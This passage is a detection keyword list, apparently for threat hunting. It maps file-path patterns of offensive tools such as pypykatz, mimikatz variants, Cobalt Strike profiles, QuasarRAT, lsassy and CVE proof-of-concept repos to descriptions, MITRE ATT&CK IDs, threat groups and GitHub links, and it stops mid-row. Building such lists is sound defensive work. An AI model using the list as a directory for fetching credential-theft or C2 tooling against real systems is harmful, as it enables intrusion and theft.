-*/pyLAPS.git*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -*/pyLAPS.py*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -*/pypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/pypykatz.py*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/skelsec/pypykatz,1,1,N/A,10,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/pyrdp.git*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*/pyrdp:latest*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*/Pysoserial.git*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,1,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*/pystinger.zip*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*/Python-dynload-os.h*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pywerview*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*/pywhisker.git*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*/pywsus.git*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,1,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -*/pywsus.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/pywsus-master.zip*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,1,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -*/qakbot.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/qconn-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/QHpix/CVE-2021-44521*,offensive_tool_keyword,POC,Automated PoC exploitation of CVE-2021-44521,T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/QHpix/CVE-2021-44521,1,1,N/A,N/A,1,9,2,2022-02-24T12:04:40Z,2022-02-24T11:07:34Z -*/qscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quake1-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quake3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quake3-master-getservers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quantloader.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/Quasar.git*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*/Quasar.v*.zip*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*/Quasar/releases*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*/quicserver.exe*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*/r00t-3xp10it*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/raceabrt.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/rahul1406/cve-2022-0847dirtypipe-exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/RAI.git*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/rakjong/mimikatz_bypassAV/*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/ramnit.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/random-robbie/cve-2022-23131-exp*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py,1,1,N/A,N/A,1,8,7,2022-02-23T16:37:13Z,2022-02-23T16:34:03Z -*/Ransomware.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*/rarce.py*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*/rasman.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*/RasmanPotato*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*/Rat_Generator*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/ratankba.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/ratchatpt.git*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatpt.git*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.go*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.go*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.syso*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.syso*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/RationalLove.c,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/raw/kali/main/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/raw/kali/master/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/raw_shellcode_size.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/rawrpc.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/RC4BinaryEncryption.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/RC4Payload32.txt*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/RCStep/CSSG/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - 